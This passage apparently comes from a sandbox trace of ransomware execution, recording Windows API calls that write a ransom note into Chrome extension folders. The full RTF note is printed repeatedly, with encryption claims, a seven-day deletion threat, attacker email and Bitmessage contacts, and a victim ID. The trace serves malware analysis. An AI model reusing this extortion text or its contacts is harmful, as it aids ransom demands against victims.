Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.359] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.360] CloseHandle (hObject=0x294) returned 1 [0272.360] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\#readme_eman#.rtf")) returned 0xffffffff [0272.360] GetLastError () returned 0x2 [0272.360] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.361] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 